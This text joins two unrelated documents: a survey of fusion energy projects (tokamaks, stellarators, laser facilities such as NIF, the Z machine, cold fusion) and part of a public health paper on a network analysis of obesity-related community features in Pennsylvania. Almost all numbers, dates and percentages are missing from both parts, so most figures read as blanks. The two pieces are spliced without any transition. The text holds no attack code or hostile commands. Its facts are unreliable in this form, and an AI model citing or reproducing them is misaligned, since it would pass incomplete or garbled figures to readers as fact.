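whereas a fully self-sustaining ('ignited') plasma corresponds to q tending to infinity; for comparison, the record jet d-t shots discussed below reached a gain of roughly 0.6 to 0.7.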
west is focused on the divertor structure to remove helium, testing the durability of the tungsten materials used. a gw demonstration power plant, known as demo, is expected to demonstrate large-scale production of electrical power on a continual basis. the conceptual design of demo was expected to be completed by , with construction beginning around and the first phase of operation commencing from . it has since been delayed, with construction now planned for after . ix. jet in , the european community (euratom, along with sweden and switzerland) launched the joint european torus (jet) project in the uk. jet is the largest tokamak operating in the world today. a similar tokamak, jt- , operates at the naka fusion institute of japan atomic energy agency in japan, but only jet has the facilities to use d-t fuel. following a legal dispute with euratom, in december jet's international contract ended and the united kingdom atomic energy authority (ukaea) took over the management of jet on behalf of its european partners. from that time jet's experimental programme has been co-ordinated by the european fusion development agreement (efda) parties. jet produced its first plasma in , and became the first experiment to produce controlled fusion power in november , albeit with high input of electricity. up to mw of fusion power for one second and mw sustained has been achieved in d-t plasmas using the device, from mw of power injected into its heating system, and many experiments are conducted to study different heating schemes and other techniques. jet has been very successful in operating remote handling techniques in a radioactive environment to modify the interior of the device and has shown that the remote handling maintenance of fusion devices is realistic. jet is a key device in preparations for iter. it has been significantly upgraded in recent years to test iter plasma physics and engineering systems. further enhancements are planned at jet with a view to exceeding its fusion power record in future d-t experiments. a compact device – the mega amp spherical tokamak (mast) – is also being developed alongside jet, partly to serve the iter project. x. kstar the kstar (korean superconducting tokamak reactor) at the national fusion research institute (nfri) in daejeon produced its first plasma in mid- . it is a pilot device for iter, and involves much international collaboration. it will be a satellite of iter during iter's operational phase from the early s. the tokamak with . metre major radius is the first to use nb3sn superconducting magnets, the same material to be used in the iter project. its first stage of development to was to prove baseline operation technologies and achieved plasma pulses of up to seconds. for the second phase of development ( - ), kstar was upgraded to study long pulses of up to seconds in h mode – the s target was in – and embark upon high-performance advanced tokamak (at) mode. it achieved seconds in high-performance plasma operation in late , a world record. in addition, kstar researchers also succeeded in achieving an alternative advanced plasma operation mode with the internal transport barrier (itb). this is a steep pressure gradient in the core of the plasma due to the enhanced core plasma confinement.
nfri said this is the first itb operation achieved in the superconducting device at the lowest heating power. kstar phase ( - ) is to develop high performance, high efficiency at mode technologies with long-pulse operation. phase ( - ) will test demo-related prior arts. the device does not have tritium handling capabilities, so will not use d-t fuel. xi. k-demo tokamak in collaboration with the us department of energy's princeton plasma physics laboratory (pppl) in new jersey and south korea’s national fusion research institute (nfri) k-demo is intended to be the next step toward commercial reactors from iter, and would be the first plant to actually contribute power to an electric grid. according to the pppl, it would generate "some billion watts of power for several weeks on end", a much greater output than iter's goal of producing million watts for seconds by the late s. k-demo is expected to have a . m diameter major radius tokamak, and a test blanket module as part of the demo breeding blanket r&d. the ministry of education, science and technology plans to invest about krw trillion (us$ million) in the project. about krw billion of that spending has already been funded. the government expects the project to employ nearly , people in the first phase, which will last throughout . k-demo is expected to have an initial operational phase from about to to develop components for the second stage, which would produce electricity. xii. east in china the experimental advanced superconducting tokamak (east) at china academy of sciences hefei institute of physical science (caships) produced hydrogen plasma at million degrees celsius and held it for seconds in . in november it achieved million degrees celsius for seconds, with input of mw of electric power. a. tftr in the usa, the tokamak fusion test reactor (tftr) operated at the princeton plasma physics laboratory (pppl) from to . d in december , tftr became the first magnetic fusion device to perform extensive experiments with plasmas composed of d-t. the following year tftr produced . mw of controlled fusion power – a record at that time. tftr set other records, including the achievement of a plasma temperature of million degrees centigrade in . however, it did not achieve its goal of break- even fusion energy (where the energy input required is no greater than the amount of fusion energy produced), but achieved all of its hardware design goals, thus making substantial contributions to the development of iter. b. alcator at the massachusetts institute of technology (mit) since the s a succession of small alcator (alto campus torus) high magnetic field torus reactors have operated on the principle of achieving high plasma pressure as the route to long plasma confinement. alcator c-mod is claimed to have the highest magnetic field and highest plasma pressure of any fusion reactor, and is the largest university-based fusion reactor in the world. it operated - . in september it achieved a plasma pressure of . atmospheres at a temperature of million degrees celsius. the plasma produced trillion fusion reactions per second and had a central magnetic field strength of . tesla. it carried . million amps of electrical current and was heated with over mw of power. the reaction occurred in a volume of approximately cubic metre and the plasma lasted for two seconds. having achieved this record performance for a fusion reactor, government funding ceased. 
a scaled-up version planned to be built at triotsk near moscow in collaboration with the kurchatov institute is ignitor, with . m diameter torus. xiii. large helical device– stellarator the large helical device (lhd) at japan's national institute for fusion science in toki, in the gifu prefecture, was the world's largest stellarator. lhd produced its first plasma in and has demonstrated plasma confinement properties comparable to other large fusion devices. it has achieved an ion temperature of . kev (about million degrees) and plasma stored energy of . million joules (mj). xiv. wendelstein -x stellarator following a year of tests, this started up at the end of , and helium plasma briefly reached about one million degrees centigrade.in it progressed to using hydrogen, and using mw it achieved plasma of million degrees centigrade for a quarter of a second. w -x is the world’s largest stellarator and it is planned to operate continuously for up to minutes. it cost € billion ($ . billion). https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes international journal of advanced network, monitoring and controls volume , no. , xv. heliac- stellarator at the australian plasma fusion research facilityat the australian national university the h- stellarator has run for some years and in was upgraded significantly. h- is capable of accessing a wide range of plasma configurations and allows exploration of ideas for improved magnetic design of the fusion power stations that will follow iter. xvi. nationalignitionfacility– laser the world's most powerful laser fusion facility, the $ billion national ignition facility (nif) at lawrence livermore national laboratory (llnl), was completed in march . using its laser beams, nif is able to deliver more than times the energy of any previous laser system to its target e . llnl announced in july that in "an historic record- breaking laser shot, the nif laser system of beams delivered more than tw of peak power and . megajoules(mj) of ultraviolet laser light to its ( mm diameter) target" for a few trillionths of a second. it was reported that in september at nif for the first time the amount of energy released through the fusion reaction exceeded the amount of energy being absorbed by the fuel, but not the amount supplied by the giant lasers. publication of this in said kj was released. an earlier high-power laser at llnl, nova, was built in for the purpose of achieving ignition. nova failed to do this and was closed in , but provided essential data that led to the design of nif. nova also generated considerable amounts of data on high-density matter physics, which is useful both in fusion power and nuclear weapons research. in connection with nif, llnl is developing the laser inertial fusion engine (life), a hybrid fusion system where neutrons resulting from laser fusion would drive a subcritical nuclear fission blanket to generate electricity. the blanket would contain either depleted uranium; used nuclear fuel; natural uranium or thorium; or plutonium- , minor actinides and fission products from reprocessed used nuclear fuel [ ] . xvii. laser mÉgajoule meanwhile, the french atomic energy commission (commissariat à l'énergieatomique, cea) has operated a similar size laser – the laser mégajoule (lmj) – near bordeaux since . its laser beams are able to generate . mj pulses for a few billionths of a second, concentrated on a small deuterium and tritium target. 
a prototype laser, the ligne d'intégration laser (lil), commenced operation in . xviii. sg-ii china's national laboratory of high-power laser and physics, associated with the china academy of science, has a laser inertial confinement experiment in shanghai – the shenguang-ii eight-beam laser facility (sg-ii), similar to the national ignition facility in the usa and the laser mégajoule in france. it is the only high power neodymium-glass solid laser facility with an active probe light in china. in a ninth beam was added, advancing the capacity for fusion research. the sg-ii facility is china's high-power laser technology international demonstration base. xix. petal and hiper lasers the petawatt aquitaine laser (petal) facility is a high energy multi-petawatt laser ( . kj energy with a duration of . to ps) under construction near bordeaux, on the same site as lil. petal will be coupled with lil to demonstrate the physics and laser technology of fast ignition. first experiments are expected in . the high power laser energy research facility (hiper) is being designed to build on the research planned at the petal project. hiper will use a long pulse laser (currently estimated at kj) combined with a kj short pulse laser. a three-year preparatory phase that commenced in has direct funding or in-kind commitments amounting to around € million from several countries. the detailed engineering phase is projected to begin in , with a six-year construction phase possibly commencing by . xx. z machine operated by sandia national laboratories, the z machine is the largest x-ray generator in the world. as with nif, the facility was built as part of the country's stockpile stewardship program, which aims to maintain the stockpile of nuclear weapons without the need for full-scale testing. conditions for fusion are achieved by passing a powerful electrical pulse (lasting less than nanoseconds) through a set of fine tungsten wires inside a metal hohlraum. the wires turn into a plasma and experience a compression ('z-pinch'), forcing the vapourized particles to collide with each other, thereby producing intense x-ray radiation. a tiny cylinder containing fusion fuel placed inside the hohlraum would therefore be compressed by the x-rays, allowing fusion to occur. in , the z machine had achieved temperatures of over billion degrees [ ], considerably higher than what is needed for fusion, and in theory high enough to allow nuclear fusion of hydrogen with heavier elements such as lithium or boron. xxi. other fusion projects there is a considerable amount of research into many other fusion projects at various stages of development. lockheed cfr. lockheed martin at its so-called 'skunk works' is developing a compact fusion reactor (cfr) which uses conventional d-t plasma in evacuated containment but confines it differently.
instead of constraining the plasma within tubular rings, a series of superconducting coils will generate a new magnetic-field geometry in which the plasma is held within the broader confines of the entire reaction chamber. the energy is supplied by radiofrequency heating. superconducting magnets within the coils will generate a magnetic field around the outer border of the chamber. the aim is to go to plasma pressure being as great as confining pressure at high enough temperature for ignition and net energy yield. heat exchangers in the reactor wall would convey energy to a gas turbine. it has progressed to a magentised ion confinement experiment, but has some way to go before any prototype, which they claim will be very much smaller than conventional designs such as the iter tokamak. italy's national agency for new technologies, energy and sustainable economic development (enea) is developing a small tokamak reactor by the name of ignitor. under an italian-russian agreement signed in may , a reactor will be assembled in italy and installed at the kurchatov institute's troitsk institute for innovation and fusion research (triniti) near moscow [ ] . an alternative to using powerful lasers for inertial confinement fusion is 'heavy ion fusion', where high- energy particles from an accelerator are focused using magnetic fields onto the fusion target. the ndcx- ii(neutralized drift compression experiment ii) accelerator has been used for heavy ion fusion experiments since at lawrence berkeley national laboratory. it is being expanded to deliver short intense pulses of ion beams with kinetic energy of . mev. high-energy-density physics (hedp) experiments with laboratory plasmas is a growing part of inertial fusion energy (ife) physics. lpp fusion (lawrenceville plasma physics) is a us enterprise developing aleuronic fusion using a dense plasma focus device (dpf or focus fusion) and hydrogen-boron fuel. the hydrogen and boron (b- ) as plasma fuse at high temperature to form a pulsed beam of helium nuclei without emitting neutrons. (the boron and hydrogen combine to produce a brief intermediate carbon- atom which rapidly decays to three alpha particles.) this charged high-energy ion beam generates electricity as it passes through a series of coils similar to a transformer, at % efficiency. the balance of energy is as by-product x-rays which are captured in an array of photoelectric receptors. lpp fusion has achieved electron energies of kev. another line of fusion research using lasers also involves fusing hydrogen and boron- (hb ) to produce helium nuclei, which continue the chain reaction from boron. one laser generates a powerful magnetic confinement field in a coil to trap the fusion reaction in a small area for a nanosecond, while a second more powerful laser triggers the nuclear fusion process. early hb fusion trials at the prague asterix laser system, using high-energy iodine lasers, have generated more energy than needed to trigger the fusion process. the polywell('polyhedron' combined with 'potential well')deviceconsists of magnetic coils arranged in a polyhedral configuration of six sides, forming a cube. a cloud of electrons is confined in the middle of the device so as to be able to accelerate and confine the positive ions to be fused. this electrostatic confinement concept differs from traditional magnetic confinement because the fields do not need to confine ions– only electrons. 
emc fusion development corporation has been researching the polywell concept and looking at hydrogen and boron as fuel for aneutronic fusion. this followed some years of development by the us navy, using deuterium fuel. general fusion is one of a number of private efforts to develop a commercial fusion power plant. the company's magnetized target fusion (mtf) approach generates a compact toroid plasma in an injector, containing and compressing it using a magnetic field before injecting it into a spherical compression chamber. the chamber holds a liquid lead-lithium liner which is pumped to create a vortex, into which the plasma target is injected. a synchronized array of pistons firing simultaneously creates a spherical compression wave in the liquid metal, compressing the plasma target and heating it to fusion conditions. founded in canada in , general fusion is funded by a syndicate of private investors, energy venture capital companies, sovereign wealth funds and the canadian government's sustainable development technology canada (sdtc) fund. a further government grant was announced in october , from the strategic innovation fund. the company has demonstrated milestones including creating - ev magnetized spheromak plasmas and confining them for over µs. much of current work underway on mtf is derived from programmes at the soviet kurchatov institute of atomic energy, under e. p. velikhov, circa . this inspired the linus project at the naval research laboratory in the usa, and later the fast-liner project at los alamos. tokamak energy in the uk is a private company developing a spherical tokamak, and hopes to commercialize this by . the company grew out of culham laboratory, home to jet, and its technology revolves around high temperature superconducting (hts) magnets, which allow for relatively low-power and small-size devices, but high performance and potentially widespread commercial deployment. its first tokamak with exclusively hts magnets – the st hts, tokamak energy's second reactor – demonstrated hours' continuous plasma during the royal society summer science exhibition in london in , a world record. the next reactor is the st at milton park in oxfordshire, which achieved first plasma in april . it is expected to produce plasma temperatures of million degrees celsius – hotter than the centre of the sun – in after the commissioning of further magnetic coils. "the st is designed to achieve million degrees c and get within a factor of ten of energy break-even conditions. to get even closer to break-even point, the plasma density, temperature and confinement time then need to be fine-tuned." the company is working with princeton plasma physics laboratory on spherical tokamaks, and with the plasma science and fusion centre at mit on hts magnets. it aims to achieve commercial scale fusion power by . xxii. cold fusion in march , spectacular claims were made for another approach, when two researchers, in the usa (stanley pons) and the uk (martin fleischmann), claimed to have achieved fusion in a simple tabletop apparatus working at room temperature. 'n-fusion', or 'cold fusion', involves the electrolysis of heavy water using palladium electrodes on which deuterium nuclei are said to concentrate at very high densities.
the researchers claimed that heat – which could only be explained in terms of nuclear processes – was produced, as well as fusion byproducts, including helium, tritium and neutrons. other experimenters failed to replicate this, however, and most of the scientific community no longer considers it a real phenomenon. xxiii. low-energy nuclear reactions (lenr) initiated by claims for 'cold fusion', research at the nanotechnology level is continuing on low-energy nuclear reactions (lenr), which apparently use weak nuclear interactions (rather than the strong force as in nuclear fission or fusion) to create low-energy neutrons, followed by neutron capture processes resulting in isotopic change or transmutation, without the emission of strong prompt radiation. lenr experiments involve hydrogen or deuterium permeation through a catalytic layer and reaction with a metal. researchers report that energy is released, though on any reproducible basis very little more than is input. the main practical example is hydrogen plus nickel powder evidently giving more heat than can be explained on any chemical basis. the japanese government is sponsoring lenr research – notably a nano-metal hydrogen energy project (mhe) – through its new energy and industrial technology development organization (nedo), and mitsubishi is also active in research. xxiv. conclusion the use of fusion power plants could substantially reduce the environmental impacts of increasing world electricity demands since, like nuclear fission power, they would not contribute to acid rain or the greenhouse effect. fusion power could easily satisfy the energy needs associated with continued economic growth, given the ready availability of fuels. there would be no danger of a runaway fusion reaction as this is intrinsically impossible and any malfunction would result in a rapid shutdown of the plant. however, although fusion does not generate long-lived radioactive products and the unburned gases can be treated on site, there would be a short- to medium-term radioactive waste problem due to activation of the structural materials. some component materials will become radioactive during the lifetime of a reactor, due to bombardment with high-energy neutrons, and will eventually become radioactive waste. the volume of such waste would be similar to the corresponding volumes from fission reactors. however, the long-term radiotoxicity of the fusion wastes would be considerably lower than that from actinides in used fission fuel, and the activation product wastes would be handled in much the same way as those from fission reactors with some years of operation [ ]. there are also other concerns, principally regarding the possible release of tritium into the environment. it is radioactive and very difficult to contain since it can penetrate concrete, rubber and some grades of steel. as an isotope of hydrogen, it is easily incorporated into water, making the water itself weakly radioactive. with a half-life of about . years, the presence of tritium remains a threat to health for about years after it is created, as a gas or in water, if at high levels. it can be inhaled, absorbed through the skin or ingested. inhaled tritium spreads throughout the soft tissues and tritiated water mixes quickly with all the water in the body.
although there is only a small inventory of tritium in a fusion reactor – a few grams – each could conceivably release significant quantities of tritium during operation through routine leaks, assuming the best containment systems. an accident could release even more. this is one reason why long-term hopes are for the deuterium-deuterium fusion process, dispensing with tritium. while fusion power clearly has much to offer when the technology is eventually developed, the problems associated with it also need to be addressed if it is to become a widely used future energy source. references [ ] fusion research: an energy option for europe's future, directorate- general for research, european commission, (isbn: ) [ ] statement by dr. raymond l. orbach, under secretary for science and director, office of science, us department of energy ( may ) [ ] national ignition facility achieves unprecedented megajoule laser shot, lawrence livermore national laboratory news release ( january ) [ ] life: clean energy from nuclear waste page on lawrence livermore national laboratory website (www.llnl.gov) [ ] z produces fusion neutrons, sandia scientists confirm, sandia national laboratories news release ( april ) [ ] sandia’s z machine exceeds two billion degrees kelvin, sandia national laboratories news release ( march ) [ ] new project aims for fusion ignition, massachusetts institute of technology news ( may ) new record for fusion, mit news ( october ) [ ] safety and environmental impact of fusion, i. cook, g. marbach, l. di pace, c. girard, n. p. taylor, eur ( ) cce-fu / ftc / (april ) https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#references http://web.mit.edu/newsoffice/ /fusion-ignition- .html © authors. this work is licensed under the creative commons attribution . license (https://creativecommons.org/licenses/by/ . /) connections (insna) issue | vol. article | doi: . /connections- - a network approach to understanding obesogenic environments for children in pennsylvania abstract network methods have been applied to obesity to map connections between obesity-related genes, model biological feedback mecha- nisms and potential interventions, and to understand the spread of obesity through social networks. however, network methods have not been applied to understanding the obesogenic environment. here, we created a network of features of communities hypothesized to be related to obesity. data from an existing study of determinants of obesity among , communities in pennsylvania were used. spearman correlation coefficients were used to describe the bivariate association between each pair of features. these correlations were used to create a network in which the nodes are community features and weighted edges are the strength of the correlations among those nodes. modules of clustered features were identified using the walktrap method. this network was plotted, and then examined separately for communities stratified by quartiles of child obesity prevalence. we also examined the relationship between measures of network centrality and child obesity prevalence. the overall structure of the network suggests that environmental features geographically co-occur, and features of the environment that were more highly correlated with body mass index were more central to the network. three clusters were identified: a crime-related cluster, a food- environment and land use-related cluster, and a physical activity- related cluster. 
the structure of connections between features of the environment differed between communities with the highest and lowest burden of childhood obesity, and a higher degree of average correlation was observed in the heaviest communities. network methods may help to explicate the concept of the obesogenic environment, and ultimately to illuminate features of the environment that may serve as levers of community-level intervention. keywords obesity, environment, networks. emily a. knapp*, usama bilal, bridget t. burke, geoff b. dougherty and thomas a. glass, johns hopkins school of public health, n. wolfe street, baltimore, md. *e-mail: eknapp @jhu.edu. this article was edited by eric quintane. networks are everywhere (barabasi, , , , ). however, in public health, network science has only now begun to make significant in-roads. to date, network science has made contributions in diverse areas of biomedical research including cellular communication in cancer (stites et al., ; berger et al., ; gill et al., ; mutation consequences and pathway analysis working group of the international cancer genome consortium, ), protein–protein interactions (jeong et al., ), and complex disease interactions (barabasi, ; goh et al., ; hidalgo et al., ; zhou et al., ). common features link these diverse applications, including high dimensional data and emergent patterns not easily visible in bivariate space.
the concept of the ‘obesogenic environment’ was first proposed in the s as a model for eval- uating the contribution of environmental factors to obesity (hill and peters, ; swinburn et al., ). the obesogenic environment assumes a pattern of spatially co-occurring features that jointly influence obesity risk. there is little doubt that aspects of the food and physical activity environment are important, but the question of how to identify patterns of fea- tures within the obesity environment remains unan- swered. tools to examine the connections between features of the obesogenic environment are needed. network analysis can be used to describe relation- ships (edges) between objects (nodes), allowing for the characterization of network-level features that are otherwise hidden. network methods also allow us to visualize these connections, facilitating understanding of a very complex epidemic and potentially prioritizing areas for intervention. in this study, we characterize the obesogenic environment with community features as nodes, and correlations between those features as edges. a version of this methodology has been used in neurologic and genetic research and is commonly referred to as ‘weighted correlation network analysis’ (fox et al., ; zhang and horvath, ). our approach examines the structure of the relationships among multiple community features, instead of ex- amining each community feature as an independent cause of obesity. the literature demonstrates a strong relationship between environmental features that impact diet and physical activity. however, existing studies have focused on single obesity-related features in isolation, most often evaluated for their linear associations with obesity. there has been scant attention to the inter- dependence of these environmental features and how relationships between obesogenic features of the environment are structured and may create qual- itatively different risk environments for obesity. we draw from network analysis tools to study these in- terrelations between features of the environment and explore how they relate to spatial patterns of obesity prevalence. we are guided by the view that transpor- tation systems, cultural variation, markets, and other system dynamics create clusters of obesity-related features that may have synergistic and aggregative effects on population behavior. market forces lead to clusters of restaurants, stores and activity spaces in the built environment (hidalgo and castañer, ). this clustering may potentiate the effect of any one facility by increasing the joint effect of a built and social environment designed to deliver excess calo- ries with maximal efficiency. therefore, the cluster- ing of features and the existence of central bridging nodes that link disparate clusters may point toward novel targets for research and intervention. our primary aim is to explore the utility of net- work analysis methods to characterize the linkages among a set of spatially patterned features of the obesogenic environment. we created a weighted network of community features from , commu- nities in pennsylvania, and examined the relationship between centrality and clustering measures and a commonly used metric of childhood overweight and connections (insna) obesity (percentage of children with body mass index (bmi) percentile ≥ th). 
methods our goal was to model the network of hypothesized obesity-related features of local environments to better understand how network and node centrality and clustering provide insights about the role of environments in child and adolescent obesity. data our study was based on data from a study of children from , communities in central and northeastern pennsylvania served by geisinger health system. from the system’s electronic medical records system (emr), we previously received data on all patients between and years old who visited a geisinger primary care physician from to . the sample included , children and , visits. the sample is representative of the youth population in the region (schwartz et al., ). this study was approved by institutional review boards at geisinger health sys- tem and johns hopkins school of public health. children were previously assigned to one of , communities based on their geocoded home address. communities consisted of census tracts within cities, and minor civil divisions (townships and boroughs) outside of cities (schwartz et al., ). from the geisinger emr we obtained longitudinal height and weight measurements for children. implausible bmi values, defined as five standard deviations above and below the median, were assumed to be mismeas- urement or data entry errors and were deleted using the standard cdc sas program (schwartz et al., ). we calculated z-scores for individual bmi, esti- mated community-level mean bmi z-score, and per- cent of children who are overweight or obese (bmi greater than or equal to the th percentile for age and sex). we then categorized communities accord- ing to quartiles of the percent of children with bmi at or above the th percentile. to characterize obesity-related features of the environment we assembled a corpus of variables hypothesized to be related to obesity based on exist- ing research. these variables include demographic, economic, and geographic information from publicly available datasets, including those published by the u.s. census, the federal bureau of investigation, and two commercial data vendors, infousa and dun & bradstreet, that provided registries of commercial food and physical activity establishments categorized using standard industry codes. table describes the community features we studied. this list was selected based on attributes that are well accepted in the literature, have acceptable measurement properties, and span a range of content domains and relations with some being related to physical activity and some related to diet. this set of variables has been used in our previous research to characterize diverse aspects of the obesity-related environment in communities (nau et al., ). we categorized all variables in quintile or quartile rank scores to preserve the rank position of variables that are often poorly distributed. after reviewing variable distributions and spearman, pearson, and phi correlation matrices, we chose spearman correlations as the best representation of variable distributions and the strength of connections. network methods given the complex nature of obesogenic environments, we looked for a way to best characterize the relation- ships between all community features. we needed to honor both the pairwise (bivariate) correlations be- tween variables and the structures that emerge from these pairwise correlations. we used a method analo- gous to weighted correlation network analysis (zhang and horvath, ). 
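as an illustration of the data preparation described above, a minimal python sketch (not the authors' original r code; the file name and column contents are hypothetical) that builds the quintile rank scores and the spearman correlation matrix later used as edge weights might look like this:

    import pandas as pd

    # hypothetical input: one row per community, one column per obesity-related feature
    features = pd.read_csv("community_features.csv")

    # quintile rank scores for every feature, as described in the text
    # (rank first so that ties do not collapse quintile boundaries)
    ranked = features.apply(lambda col: pd.qcut(col.rank(method="first"), 5, labels=False))

    # pairwise spearman correlations; their absolute values become the undirected edge weights
    corr = ranked.corr(method="spearman").abs()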
we generated a data array of covariates ( obesity-related community features) that we treat as nodes in a network of interconnected environmental attributes. edges were operationalized as the strength of the bivariate correlation between each pair of attributes. bivariate correlations were estimated using pairwise spearman correlation coefficients between the community variables. because we were primarily interested in the strength of linkages among nodes and there is controversy over the direction of the relationships between some of these variables and obesity, we chose to use the absolute value of the correlation between variables. all pairwise correlations were then converted to a weighted undirected adjacency matrix where each cell was the correlation between any two variables. we created a weighted graph from this adjacency matrix using the r package igraph (version . . ) (csardi and nepusz, ), specifying pairwise correlations as the edge weights. from this graph, we obtained five sets of results.

first, we plotted an overall network graph using all , communities. the coordinates of each node were computed using a force-based algorithm, the fruchterman-reingold algorithm (fruchterman and reingold, ), where the attraction between nodes is proportional to the strength of the correlation between environmental features (nodes). we implemented the version of the algorithm in the r package qgraph (version . . ) (epskamp et al., ). the second set of results represents the same graph stratified by community obesity burden (quartiles). for ease of interpretation we show plots corresponding to quartile and (the thinnest and heaviest communities, respectively; see fig. (overall network) and fig. (stratified network)).

table . obesity-related community features included in network analysis.
variable identifier   feature
c-    violent crime per , population
c-    crimes against person per , pop
c-    crimes against property per , pop
f-    grocery stores and supermarkets per square mile
f-    gas stations and convenience stores per square mile
f-    snack stores (donuts, pretzels, ice cream) per square mile
f-    all food establishments per square mile
f-    fast food chain restaurants, count
f-    all retail food establishments per square mile
f-    all food service establishments per square mile
f-    diversity of food establishments in categories
f-    limited service restaurants per capita
f-    full service restaurants per capita
f-    bars and taverns per capita
f-    health food and gourmet stores per capita
f-    fruit and vegetable stores and stalls per square mile
f-    discount stores per square mile
l-    average block length
l-    household density
l-    road intersection density
l-    road segment length diversity
p-    diversity of physical activity establishments in categories
p-    indoor recreational centers per square mile
p-    outdoor recreational centers per square mile
p-    public outdoor parks and recreational spaces per street mile
p-    all physical activity establishments per square mile
p-    indoor fitness and recreational facilities per street mile
p-    outdoor fitness & recreational facilities per capita
p-    indoor recreational clubs and organizations per square mile
p-    outdoor recreational clubs and organizations per square mile
t-    vehicle miles traveled on main roads (total)
t-    vehicle miles traveled on main roads per capita
notes: data are from combined info usa and d&b databases, ; the federal bureau of investigation uniform crime reporting system; u.s. census ; and pennsylvania state government.

third, in order to better understand the relationships between the components of the obesogenic environment, we sought to obtain a measure of clustering and community structure that allowed us to evaluate if network structure was different across communities classified by prevalence of childhood obesity. we conducted a module detection analysis using the walktrap method (pons and latapy, ) that performs a series of 'random walks' between nodes. the probability of 'walking' from one node to the next is proportional to the weight of the edge between the nodes, meaning that a walk is more likely to occur between two highly correlated nodes. each node is restricted to membership in one module. this creates modules of variables that are highly connected to each other. we then calculated the normalized network modularity score (newman, ), which quantifies the strength of the connections within and between modules. a higher modularity score indicates a network with high within-module connectivity and low between-module connectivity. we calculated the modularity score for the overall network graph and each of the four graphs based on community strata of burden of childhood obesity (see table ). we used the pairwise correlation between variables (nodes) as a weight in the computation of modularity.

fourth, we calculated an overall measure of network centrality by calculating the average network degree (barrat et al., ). in a weighted undirected network like ours, average network degree is the mean of all pairwise correlations (barrat et al., ). a high average network degree represents a network that has an overall tighter correlation between all nodes. we calculated average network degree for the overall network graph and each of the four network graphs based on obesity prevalence (see table ).
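before describing the fifth set of results, the graph construction, walktrap module detection, modularity, and average network degree just described (the third and fourth sets of results) could be computed along the following lines. this is a hedged sketch rather than the authors' code: 'features' is a hypothetical community-by-feature matrix (rank-scored as described above), and the layout call uses igraph's fruchterman-reingold implementation as a stand-in for the qgraph version used in the paper.

library(igraph)

# weighted, undirected adjacency matrix of absolute spearman correlations
adj <- abs(cor(features, method = "spearman", use = "pairwise.complete.obs"))
diag(adj) <- 0

g <- graph_from_adjacency_matrix(adj, mode = "undirected",
                                 weighted = TRUE, diag = FALSE)

# module detection via random walks (walktrap), weighted by the correlations
modules <- cluster_walktrap(g, weights = E(g)$weight)
membership(modules)

# modularity of the detected module structure
modularity(g, membership(modules), weights = E(g)$weight)

# average network degree, summarized here as the mean pairwise correlation
mean(E(g)$weight)

# force-directed plot; node coordinates from a fruchterman-reingold layout
plot(g, layout = layout_with_fr(g, weights = E(g)$weight),
     vertex.size = 5, edge.width = E(g)$weight * 3)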
fifth, we examined the association between the centrality of a node and its correlation with the prevalence of childhood obesity. for this, we plotted the degree centrality of each node against that node's correlation with the prevalence of childhood obesity (fig. ).

figure : network graph for , communities in pennsylvania. this shows a graph of the network of connections between attributes of communities in , communities in pennsylvania. each node in the network represents one feature of the communities, and the edges in the network are absolute values of spearman correlation coefficients. the bivariate correlation between each variable and average body mass index (bmi) z-score is shown by the shading of each node, with darker colors representing stronger absolute correlation with average community bmi z-score. the strength of absolute correlation between two nodes is represented by the darkness and thickness of the lines connecting the variables. a thick, dark line may represent either a strong positive or a strong negative correlation. modules of highly connected variables were created using the walktrap method.

results the purpose of this analysis was to apply network methodology to characterize patterns of linkages and interactions among obesity-related environmental features among communities in pennsylvania. figure is a graph of the network of connections (pairwise correlations) between nodes (obesity-related features) in , pennsylvania communities.

figure : network graphs for communities in pennsylvania, by quartile of percent of children at or above the th percentile of bmiz. in communities in the lowest quartile of percent of children who are overweight or obese (a: left), community features appear to be less tightly clustered, i.e., co-occur less often, than in communities in the highest quartile of community bmiz (b: right).

table . network modularity and average network degree in the overall network and by quartile of prevalence of childhood obesity.
                          quartile | quartile | quartile | quartile | overall network
network modularity        .        | .        | .        | .        | .
average network degree    .        | .        | .        | .        | .
note: quartile represents communities with the lowest prevalence of child overweight and obesity, and quartile represents communities with the highest prevalence of child overweight and obesity. higher modularity indicates a network with high within-module connectivity and low between-module connectivity. average network degree is the mean of all pairwise correlations.

the graph illustrates three important network characteristics. first, three clusters of tightly-connected variables were identified using the walktrap method. a cluster of the three crime-related variables (rates per , persons of crimes against property, crimes against persons, and all part i offenses) can be seen (green shading), and is weakly linked to the main network. this suggests that communities with high rates of violent crime (i.e., assault) also have high rates of crime against property (i.e., arson). crime rates appear to be moderately correlated with obesity rates as indicated by the dark color of the crime-related nodes. a second cluster is identified consisting of features representing land use patterns, transportation, and food establishment density (yellow shading).
we believe this represents the spatial clustering that occurs in the context of suburban sprawl with co-location of establishments in high-volume transportation corridors. the nodes at the heart of this cluster include household density (per square mile) and all food establishments per square mile. this second cluster appears to be the tightest. eleven of the nodes have an above average absolute correlation with obesity. the model identified a third cluster (pale blue shading) consisting mostly of features that describe the physical activity environment. these include diversity of physical activity establishments, outdoor recreational facilities per square mile, snack stores (e.g., donuts, pretzels, ice cream) per square mile, indoor recreation centers per square mile, all physical activity establishments per square mile, indoor fitness and recreational facilities per street mile, and indoor recreational clubs and facilities per square mile. in both the second and third clusters, the nodes that are most highly correlated with obesity (indicated by darker node color) are more central in the network overall, as well as within each cluster. not all of the food or physical activity nodes are clustered. at the edge of the graph we see several food or physical activity nodes that are not as tightly coupled (including parks and big box stores). finally, the overall structure of the network suggests that elements of these communities are geographically clustered and are not randomly dispersed across communities, especially features of the physical, food, and land use environments.

next, we were interested in whether the structure of this network of features varied across strata of community obesity burden. figure shows the result of running a similar network model separately by quartile of percent of children at or above the th percentile on bmi-z, a threshold widely considered to be indicative of overweight and obesity burden. among communities in the lowest quartile of obesity prevalence (fig. a), community features appear to be less tightly connected than in communities in the highest quartile of obesity prevalence (fig. b). this is also described by the higher modularity in table . for example, among lower obesity prevalence communities, crime is weakly linked to the land use-food-physical activity cluster; but in higher obesity prevalence communities, crime is more tightly linked to this cluster. it is not just that quantities of these features are larger in heavier communities, but that the connections between features are also altered: communities that give rise to higher rates of childhood obesity are structured differently than those with less child obesity.

figure : association of degree centrality of each community feature with prevalence of overweight and obesity among children. correlation between community features and body mass index is stronger for more central variables of the obesity-related network features (r = . ).

table shows the results of the network structure analysis, overall, and stratified by quartile of obesity. the overall network has a positive modularity of . , indicating that the nodes (environmental features) show a degree of clustering (as compared to a random distribution of nodes with no clustering).
